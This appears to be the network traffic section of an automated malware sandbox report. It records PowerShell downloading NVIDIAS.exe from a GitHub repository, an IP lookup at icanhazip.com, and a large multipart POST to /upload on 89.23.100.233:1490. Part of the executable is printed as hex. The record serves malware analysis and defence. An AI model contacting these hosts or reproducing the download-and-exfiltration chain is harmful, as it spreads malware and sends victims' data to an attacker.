                                                                      Dec 16, 2024 17:30:18.150234938 CET49708443192.168.11.20185.199.108.133
                                                                      Dec 16, 2024 17:30:18.152676105 CET44349708185.199.108.133192.168.11.20
                                                                      Dec 16, 2024 17:30:18.152683973 CET44349708185.199.108.133192.168.11.20
                                                                      Dec 16, 2024 17:30:18.152877092 CET49708443192.168.11.20185.199.108.133
                                                                      Dec 16, 2024 17:30:18.152882099 CET44349708185.199.108.133192.168.11.20
                                                                      Dec 16, 2024 17:30:18.152978897 CET49708443192.168.11.20185.199.108.133
                                                                      Dec 16, 2024 17:30:18.153162003 CET49708443192.168.11.20185.199.108.133
                                                                      Dec 16, 2024 17:30:18.154098988 CET44349708185.199.108.133192.168.11.20
                                                                      Dec 16, 2024 17:30:18.154139042 CET44349708185.199.108.133192.168.11.20
                                                                      Dec 16, 2024 17:30:18.154252052 CET49708443192.168.11.20185.199.108.133
                                                                      Dec 16, 2024 17:30:18.154345036 CET49708443192.168.11.20185.199.108.133
                                                                      Dec 16, 2024 17:30:18.163187981 CET49708443192.168.11.20185.199.108.133
                                                                      Dec 16, 2024 17:30:18.270690918 CET49708443192.168.11.20185.199.108.133
                                                                      Dec 16, 2024 17:30:20.627796888 CET4970980192.168.11.20104.16.184.241
                                                                      Dec 16, 2024 17:30:20.762401104 CET8049709104.16.184.241192.168.11.20
                                                                      Dec 16, 2024 17:30:20.762703896 CET4970980192.168.11.20104.16.184.241
                                                                      Dec 16, 2024 17:30:20.762933016 CET4970980192.168.11.20104.16.184.241
                                                                      Dec 16, 2024 17:30:20.898236036 CET8049709104.16.184.241192.168.11.20
                                                                      Dec 16, 2024 17:30:20.911046982 CET8049709104.16.184.241192.168.11.20
                                                                      Dec 16, 2024 17:30:20.963830948 CET4970980192.168.11.20104.16.184.241
                                                                      Dec 16, 2024 17:30:26.789707899 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:27.063812971 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:27.063962936 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:27.065135002 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:27.066083908 CET4970980192.168.11.20104.16.184.241
                                                                      Dec 16, 2024 17:30:27.200745106 CET8049709104.16.184.241192.168.11.20
                                                                      Dec 16, 2024 17:30:27.200937986 CET4970980192.168.11.20104.16.184.241
                                                                      Dec 16, 2024 17:30:27.387697935 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:27.432596922 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:27.433207989 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:27.433310032 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:27.480303049 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:27.524967909 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:27.705184937 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:27.705595970 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:27.705606937 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:27.705748081 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:27.705802917 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:27.714523077 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:27.714719057 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:27.714766979 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:27.725014925 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:27.725249052 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:27.725301981 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:27.746373892 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:27.746556044 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:27.746607065 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:27.757807970 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:27.757989883 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:27.768263102 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:27.768474102 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:27.768528938 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:27.768570900 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:27.790621996 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:27.790781975 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:27.790860891 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:27.995383978 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:27.995563030 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:27.995618105 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:27.997608900 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:27.997837067 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:27.997889996 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:28.022023916 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:28.022176027 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:28.022227049 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:28.043710947 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:28.043859005 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:28.043914080 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:28.056097984 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:28.056261063 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:28.056315899 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:28.086653948 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:28.086837053 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:28.086890936 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:28.109075069 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:28.109224081 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:28.109277964 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:28.109321117 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:28.130367994 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:28.130597115 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:28.130649090 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:28.156305075 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:28.156481028 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:28.156531096 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:28.167726040 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:28.167907000 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:28.167959929 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:28.268358946 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:28.268579960 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:28.268631935 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:28.287287951 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:28.287523985 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:28.287573099 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:28.312625885 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:28.312920094 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:28.312987089 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:28.335038900 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:28.335272074 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:28.335324049 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:28.356633902 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:28.356775999 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:28.356826067 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:28.377672911 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:28.377795935 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:28.377847910 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:28.388624907 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:28.388833046 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:28.388880014 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:28.412461996 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:28.412636042 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:28.435219049 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:28.435400963 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:28.435419083 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:28.467753887 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:28.467937946 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:28.478322983 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:28.478518963 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:28.513653040 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:28.536565065 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:28.561970949 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:28.583075047 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:28.605907917 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:28.629363060 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:28.651484966 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:28.673429012 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:28.697140932 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:28.719824076 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:28.742041111 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:28.754005909 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:28.790797949 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:28.812171936 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:28.835036039 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:28.858971119 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:28.869510889 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:28.894464970 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:28.930051088 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:28.960978985 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:29.012969017 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:30.677814007 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:30.705744982 CET14904971089.23.100.233192.168.11.20
                                                                      Dec 16, 2024 17:30:30.705916882 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:30.707114935 CET497101490192.168.11.2089.23.100.233
                                                                      Dec 16, 2024 17:30:30.979585886 CET14904971089.23.100.233192.168.11.20
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Dec 16, 2024 17:30:15.729980946 CET6367053192.168.11.201.1.1.1
                                                                      Dec 16, 2024 17:30:15.865897894 CET53636701.1.1.1192.168.11.20
                                                                      Dec 16, 2024 17:30:16.664530993 CET6160853192.168.11.201.1.1.1
                                                                      Dec 16, 2024 17:30:16.799242973 CET53616081.1.1.1192.168.11.20
                                                                      Dec 16, 2024 17:30:20.476927042 CET4974753192.168.11.201.1.1.1
                                                                      Dec 16, 2024 17:30:20.611960888 CET53497471.1.1.1192.168.11.20
                                                                      Dec 16, 2024 17:30:20.929265976 CET5080053192.168.11.201.1.1.1
                                                                      Dec 16, 2024 17:30:21.070827007 CET53508001.1.1.1192.168.11.20
                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Dec 16, 2024 17:30:15.729980946 CET192.168.11.201.1.1.10xb3d7Standard query (0)github.comA (IP address)IN (0x0001)false
                                                                      Dec 16, 2024 17:30:16.664530993 CET192.168.11.201.1.1.10xc21aStandard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                      Dec 16, 2024 17:30:20.476927042 CET192.168.11.201.1.1.10x4146Standard query (0)icanhazip.comA (IP address)IN (0x0001)false
                                                                      Dec 16, 2024 17:30:20.929265976 CET192.168.11.201.1.1.10x9c3Standard query (0)247.106.0.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Dec 16, 2024 17:30:15.865897894 CET1.1.1.1192.168.11.200xb3d7No error (0)github.com140.82.113.4A (IP address)IN (0x0001)false
                                                                      Dec 16, 2024 17:30:16.799242973 CET1.1.1.1192.168.11.200xc21aNo error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                      Dec 16, 2024 17:30:16.799242973 CET1.1.1.1192.168.11.200xc21aNo error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                      Dec 16, 2024 17:30:16.799242973 CET1.1.1.1192.168.11.200xc21aNo error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                      Dec 16, 2024 17:30:16.799242973 CET1.1.1.1192.168.11.200xc21aNo error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                      Dec 16, 2024 17:30:20.611960888 CET1.1.1.1192.168.11.200x4146No error (0)icanhazip.com104.16.184.241A (IP address)IN (0x0001)false
                                                                      Dec 16, 2024 17:30:20.611960888 CET1.1.1.1192.168.11.200x4146No error (0)icanhazip.com104.16.185.241A (IP address)IN (0x0001)false
                                                                      Dec 16, 2024 17:30:21.070827007 CET1.1.1.1192.168.11.200x9c3Name error (3)247.106.0.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                      • github.com
                                                                      • raw.githubusercontent.com
                                                                      • icanhazip.com
                                                                      • 89.23.100.233:1490
                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.11.2049709104.16.184.24180716C:\ProgramData\QQQ\NVIDIAS.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 16, 2024 17:30:20.762933016 CET63OUTGET / HTTP/1.1
                                                                      Host: icanhazip.com
                                                                      Connection: Keep-Alive
                                                                      Dec 16, 2024 17:30:20.911046982 CET538INHTTP/1.1 200 OK
                                                                      Date: Mon, 16 Dec 2024 16:30:20 GMT
                                                                      Content-Type: text/plain
                                                                      Content-Length: 16
                                                                      Connection: keep-alive
                                                                      Access-Control-Allow-Origin: *
                                                                      Access-Control-Allow-Methods: GET
                                                                      Set-Cookie: __cf_bm=WmS8IqDlH10kuzLlhhKWi1WouPCGSraZ.fa86IAWUK8-1734366620-1.0.1.1-UnlmHDgGTcI0WKy6GFFxFFT80XFNXmfC7.ACCSIZqXTu3mI6dghDW7fsOjscrEIMs9NoyznH5.Io.cxBrZhJYA; path=/; expires=Mon, 16-Dec-24 17:00:20 GMT; domain=.icanhazip.com; HttpOnly
                                                                      Server: cloudflare
                                                                      CF-RAY: 8f300eb43cae32ef-JAX
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      Data Raw: 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 30 35 0a
                                                                      Data Ascii: 102.129.152.205


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.11.204971089.23.100.2331490716C:\ProgramData\QQQ\NVIDIAS.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 16, 2024 17:30:27.065135002 CET205OUTPOST /upload HTTP/1.1
                                                                      Content-Type: multipart/form-data; boundary="8329d0ed-a884-470e-bcd9-c4075adde960"
                                                                      Host: 89.23.100.233:1490
                                                                      Content-Length: 119581
                                                                      Expect: 100-continue
                                                                      Connection: Keep-Alive
                                                                      Dec 16, 2024 17:30:27.480303049 CET25INHTTP/1.1 100 Continue
                                                                      Dec 16, 2024 17:30:27.705184937 CET25INHTTP/1.1 100 Continue
                                                                      Dec 16, 2024 17:30:30.677814007 CET165INHTTP/1.1 200 OK
                                                                      Server: Werkzeug/3.1.3 Python/3.13.0
                                                                      Date: Mon, 16 Dec 2024 16:30:30 GMT
                                                                      Content-Type: application/json
                                                                      Content-Length: 61
                                                                      Connection: close


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.11.2049707140.82.113.4443712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-12-16 16:30:16 UTC200OUTGET /pr0niums/Repo/raw/refs/heads/main/NVIDIAS.exe HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                      Host: github.com
                                                                      Connection: Keep-Alive
                                                                      2024-12-16 16:30:16 UTC556INHTTP/1.1 302 Found
                                                                      Server: GitHub.com
                                                                      Date: Mon, 16 Dec 2024 16:30:16 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                      Access-Control-Allow-Origin:
                                                                      Location: https://raw.githubusercontent.com/pr0niums/Repo/refs/heads/main/NVIDIAS.exe
                                                                      Cache-Control: no-cache
                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                      X-Frame-Options: deny
                                                                      X-Content-Type-Options: nosniff
                                                                      X-XSS-Protection: 0
                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                      2024-12-16 16:30:16 UTC3382INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.11.2049708185.199.108.133443712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-12-16 16:30:17 UTC211OUTGET /pr0niums/Repo/refs/heads/main/NVIDIAS.exe HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                      Host: raw.githubusercontent.com
                                                                      Connection: Keep-Alive
                                                                      2024-12-16 16:30:17 UTC899INHTTP/1.1 200 OK
                                                                      Connection: close
                                                                      Content-Length: 827904
                                                                      Cache-Control: max-age=300
                                                                      Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                      Content-Type: application/octet-stream
                                                                      ETag: "317652998dd72f13454ac04447e72e72256f7ce09ae70676fd3838f322f1f312"
                                                                      Strict-Transport-Security: max-age=31536000
                                                                      X-Content-Type-Options: nosniff
                                                                      X-Frame-Options: deny
                                                                      X-XSS-Protection: 1; mode=block
                                                                      X-GitHub-Request-Id: 1996:3A3B9A:146301D:16811AD:67605596
                                                                      Accept-Ranges: bytes
                                                                      Date: Mon, 16 Dec 2024 16:30:17 GMT
                                                                      Via: 1.1 varnish
                                                                      X-Served-By: cache-gnv1820028-GNV
                                                                      X-Cache: MISS
                                                                      X-Cache-Hits: 0
                                                                      X-Timer: S1734366617.280570,VS0,VE211
                                                                      Vary: Authorization,Accept-Encoding,Origin
                                                                      Access-Control-Allow-Origin: *
                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                      X-Fastly-Request-ID: fef6e1703c8f0ff7840741b1465efb071649e3ad
                                                                      Expires: Mon, 16 Dec 2024 16:35:17 GMT
                                                                      Source-Age: 0
                                                                      2024-12-16 16:30:17 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 a4 7d eb 96 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 a2 02 00 00 18 00 00 00 00 00 00 1c 7e 0d 00 00 20 00 00 00 e0 02 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 18 00 00 04 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL}"0~ @ `
                                                                      2024-12-16 16:30:17 UTC16384INData Raw: 28 30 5a a8 fc d4 1e 57 c6 3b 27 d9 b0 3b 69 40 42 55 bf e7 28 d3 54 27 71 a6 0e 11 be 29 e3 a3 96 f1 2f 15 c8 4b 88 20 25 47 c7 53 db 8b b6 e4 7b 06 a0 0d 40 00 9f 74 13 44 c1 da 59 3c 44 4c ab f9 a6 5a 5e b5 4c e6 56 8d 87 b7 0e 32 4c f7 12 a0 bb 2f a3 8f 95 4e de b1 fa 70 d0 dc 2c 32 83 cc a6 e1 36 9a e0 d2 50 c4 b0 5e f3 c8 f0 ef f8 61 9e e4 e6 ad b3 1f a3 71 1f 57 d0 05 c4 16 46 07 89 be 19 4e e6 9c 70 06 21 67 52 40 b7 ef 94 6b 60 7d f7 38 cb 84 2f bd ce 32 0a e9 02 55 8b 40 65 0a 11 0e 18 eb 82 4e b7 c9 10 f6 96 57 6c 5e 1e 42 81 1a 70 cf a9 65 80 9d 51 05 27 e2 dc 7a 16 10 a5 d9 4b 6e a5 9d 6e 90 64 1f 17 28 35 84 02 91 1b d5 06 91 04 66 c5 10 56 62 72 99 27 a5 ea 67 98 35 ba e3 87 ea 29 79 10 9d 24 2d 1e b7 e1 b5 b3 e0 3c 39 62 09 a1 20 f9 76 f7
                                                                      Data Ascii: (0ZW;';i@BU(T'q)/K %GS{@tDY<DLZ^LV2L/Np,26P^aqWFNp!gR@k`}8/2U@eNWl^BpeQ'zKnnd(5fVbr'g5)y$-<9b v
                                                                      2024-12-16 16:30:17 UTC16384INData Raw: 2c 3f e7 82 73 ca 4f 9d 16 6f cc dd f3 0f a7 54 14 ff 73 d5 db e9 4e 75 31 07 23 e5 5d b9 f3 c8 6e 54 d3 d6 9d ce 36 28 10 11 b4 f2 eb f4 45 8c f4 e8 cb f3 68 a1 f1 9d 8b 6e e4 dc fb 34 9c 82 08 3c 73 bd 9f ba f7 8b d8 16 78 9e 71 f7 40 58 4d 00 53 79 7d 82 29 a0 79 c6 fc f0 fd 6d 0a 6c 7c fb dd 01 a4 ca be f7 53 d8 14 2c 03 4e 89 11 ff e2 3e dc 3a 36 77 2f 0a d6 8f 09 3c f4 f7 69 2b 42 b5 ff f3 ef b3 44 37 c8 ae 03 d3 9f 7c b1 83 63 82 3b 93 3f 28 8a 77 53 03 99 58 10 16 ea af cb 02 cc d6 09 cb 5c e5 99 6c fe c7 0a 0c 68 4e 8c 7a 27 ed b4 f2 76 59 01 b8 a8 3d a8 76 f5 60 b1 92 63 d4 62 89 30 f0 47 c5 2b 32 6a 73 eb 5c 34 4e 2d 27 62 6f ee 3b 8d c8 a3 0f 0f 13 0b 71 54 15 7d ad 20 b0 42 75 1d 5b c7 f5 5e 2f 87 1a c8 87 a5 9d 57 1b d3 5c a3 2d dd 83 f6 d4
                                                                      Data Ascii: ,?sOoTsNu1#]nT6(Ehn4<sxq@XMSy})yml|S,N>:6w/<i+BD7|c;?(wSX\lhNz'vY=v`cb0G+2js\4N-'bo;qT} Bu[^/W\-
                                                                      2024-12-16 16:30:17 UTC16384INData Raw: 74 a8 7e f9 a4 b5 b4 8b fd c4 7f b0 78 29 72 0f 09 cd 50 70 90 69 e8 e1 25 26 86 12 5c 91 a2 bf 9a d6 6c 2f b2 3f 1a 2c de 31 90 a0 f5 de 77 a2 7a 7a cb 49 f7 ec b2 70 83 d4 d0 76 eb d5 e5 82 b0 95 7a 41 ec 05 37 3c 71 9b 58 92 44 9a 2f 87 dc c5 1e 01 66 da b2 23 79 ff 10 61 e5 fc a5 e2 47 52 a5 ce d5 1c ed d9 d8 d3 2d c8 87 4b 57 f4 50 7d 26 a9 23 b0 49 45 8e 18 1d ac 0c d7 36 dd 5e 2f e2 44 9e 8d e5 25 b6 00 a9 64 99 88 9e 5c f5 37 d6 cd 81 5a 71 ef 62 e7 23 1e a5 97 88 46 2a ab 0b c5 ed 73 b9 0e 81 cd b3 65 ea be e7 45 4b 86 98 58 4e e5 91 39 67 59 63 75 68 74 39 4c 30 74 24 22 d3 dd 2f 56 47 4b 0a b2 d8 07 cd 41 7b 94 0b 1c 8d 47 4b fa 4f ed d4 0d b1 1d d7 23 24 a5 dc f7 6b f0 4f 57 de aa 92 20 7b 54 41 de 2e 7d 80 6d 88 82 84 23 b5 65 09 5b b2 51 19
                                                                      Data Ascii: t~x)rPpi%&\l/?,1wzzIpvzA7<qXD/f#yaGR-KWP}&#IE6^/D%d\7Zqb#F*seEKXN9gYcuht9L0t$"/VGKA{GKO#$kOW {TA.}m#e[Q
                                                                      2024-12-16 16:30:17 UTC16384INData Raw: 75 7b bf c0 70 fe f8 6d 2e ca 79 fa ca b5 46 e7 f3 11 8e 4e 6d 3b 72 cf b8 44 58 d4 9b 4b d2 44 0c e8 5b bf 7a a8 5c c0 94 19 dc 19 ed f1 45 95 01 6b 63 01 58 53 46 ee d0 7c 81 73 86 77 30 51 c8 62 dd df 3b 8b ca 78 25 aa 00 88 17 da 1c 26 e7 fb f8 8f fa 49 71 61 b8 36 be 93 0d 96 51 e3 35 9c 20 47 bb c5 e6 6a c2 9d d6 0d 1b 2e f1 13 c5 11 3d d4 93 55 b1 46 75 f5 87 35 9d 1a b6 46 06 97 f6 77 bf 5b 10 00 fa 55 e5 0a 11 a8 53 07 4a 25 3e 17 2c 07 c3 67 c9 10 f5 7a d5 0c fd aa 35 71 04 2f 9a ef be af 9f c4 4b 61 e1 ba c5 71 9e 03 5a 7a 56 5f 7a 5d 7e de b3 ab b3 08 42 35 ee af 2a ef ff 28 64 fe 98 c3 44 76 c1 64 8f f2 0a c7 4e 7e 8c de 83 17 8f 3d 57 2f 78 b2 4d b1 cb 0b bc 85 1a a4 8c 44 f7 22 aa a7 88 ca 8d 69 a7 ee a0 c0 95 68 3c 8c bf 2e 4d db a6 fb 42
